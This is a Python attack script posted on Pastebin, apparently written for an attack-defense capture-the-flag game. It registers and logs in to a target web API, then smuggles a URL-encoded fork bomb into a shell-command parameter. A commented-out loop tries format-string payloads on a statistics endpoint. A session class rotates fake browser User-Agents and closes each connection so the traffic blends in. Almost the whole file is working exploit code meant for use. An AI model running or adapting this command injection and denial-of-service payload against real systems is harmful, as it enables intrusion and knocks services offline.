SHARE
TWEET

Untitled

a guest May 19th, 2019 83 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-
  3.  
  4. from __future__ import print_function
  5.  
  6. import re
  7. import os
  8. import random
  9. import string
  10. import requests
  11. from sys import argv
  12.  
  13. from os import environ as env
  14.  
  15. env["TERM"] = "linux"
  16. env["TERMINFO"]="/etc/terminfo"
  17. """
  18.     FakeSession reference:
  19.         - `s = FakeSession(host, PORT)` -- creation
  20.         - `s` mimics all standard request.Session API except of fe features:
  21.             -- `url` can be started from "/path" and will be expanded to "http://{host}:{PORT}/path"
  22.             -- for non-HTTP scheme use "http://{host}/path" template which will be expanded in the same manner
  23.             -- `s` uses random browser-like User-Agents for every requests
  24.             -- `s` closes connection after every request, so exploit get splitted among multiple TCP sessions
  25.     Short requests reference:
  26.         - `s.post(url, data={"arg": "value"})`          -- send request argument
  27.         - `s.post(url, headers={"X-Boroda": "DA!"})`    -- send additional headers
  28.         - `s.post(url, auth=(login, password)`          -- send basic http auth
  29.         - `s.post(url, timeout=1.1)`                    -- send timeouted request
  30.         - `s.request("CAT", url, data={"eat":"mice"})`  -- send custom-verb request
  31.         (response data)
  32.         - `r.text`/`r.json()`  -- text data // parsed json object
  33. """
  34.  
  35. """ <config> """
  36. # SERVICE PORT
  37. PORT = 8000
  38. IP = argv[1]
  39. #IP = ''
  40. # DEBUG enables verbose output of all socket messages
  41. DEBUG = os.getenv("DEBUG", False)
  42.  
  43. """ <body> """
  44. def steal(host = IP):
  45.     s = FakeSession(host, PORT)
  46.     login = rand_string()
  47.     passw = rand_string()
  48.     repl = s.post("/api/registration",
  49.                   json={'username': login, 'password': passw})
  50.  
  51.  
  52.     # print(repl.text)
  53.    
  54.  
  55.     repl = s.post("/api/login",
  56.                   json={'username': login, 'password': passw})
  57.  
  58.     # print(repl.headers)
  59.     headers = {'Authorization': repl.headers['Authorization']}
  60.     # print("----------")
  61.  
  62.     serial = rand_string()
  63.     repl = s.post("/api/android",
  64.                   json={'name': rand_string(), 'serialNumber': serial, 'password': rand_string(), 'type': 'WORKER'}, headers=headers)
  65.     # print(repl.text)
  66.     # print(repl)
  67.  
  68.     repl = s.get(
  69.         '/api/android/{}/shell/OS?params=;bomb()%7B%0A%20%20bomb%20%7C%20bomb%20%26%20%0A%7D%0Abomb#'.format(serial), headers=headers)
  70.     print(repl.text, flush=True)
  71.     # print("----------")
  72.     # for i in range(50, 10000):
  73.     #     repl = s.get("/api/user/"+ str(i) + "/statistics?format=f%251%24s", headers=headers)
  74.     #     print (repl.text, flush=True)
  75.     #s.get("/index.php")
  76.  
  77. """ </body> """
  78.  
  79. def die(msg):
  80.     print(msg)
  81.     exit(1)
  82.  
  83. def log(obj):
  84.     if DEBUG:
  85.         print(obj)
  86.     return obj
  87.  
  88. def fake_flag():
  89.     return rand_string(N=31, alph=string.ascii_uppercase+string.digits) + "="
  90.  
  91. def rand_string(N=12, alph=string.ascii_letters + string.digits):
  92.     return ''.join(random.choice(alph) for _ in range(N))
  93.  
  94. class FakeSession(requests.Session):
  95.     USER_AGENTS = [
  96.         """Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15""",
  97.         """Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36""",
  98.         """Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201""",
  99.         """Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13; ) Gecko/20101203""",
  100.         """Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0"""
  101.     ]
  102.  
  103.     def __init__(self, host, port):
  104.         super(FakeSession, self).__init__()
  105.         if port:
  106.             self.hostport = "{}:{}".format(host, port)
  107.         else:
  108.             self.hostport = host
  109.  
  110.     def prepare_request(self, request):
  111.         r = super(FakeSession, self).prepare_request(request)
  112.         r.headers['User-Agent'] = random.choice(FakeSession.USER_AGENTS)
  113.         r.headers['Connection'] = "close"
  114.         return r
  115.  
  116.     def request(self, method, url,
  117.             params=None, data=None, headers=None, cookies=None, files=None,
  118.             auth=None, timeout=None, allow_redirects=True, proxies=None,
  119.             hooks=None, stream=None, verify=None, cert=None, json=None):
  120.         if url[0] == "/" and url[1] != "/":
  121.             url = "http://" + self.hostport + url
  122.         else:
  123.             url = url.format(host=self.hostport)
  124.         args = locals()
  125.         args.pop("self")
  126.         args.pop("__class__")
  127.         r = super(FakeSession, self).request(**args)
  128.         if DEBUG:
  129.             print("[DEBUG] {method} {url} {r.status_code}".format(**locals()))
  130.         return r
  131.  
  132.  
  133. if __name__ == "__main__":
  134.     try:
  135.         steal()
  136.     except:
  137.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top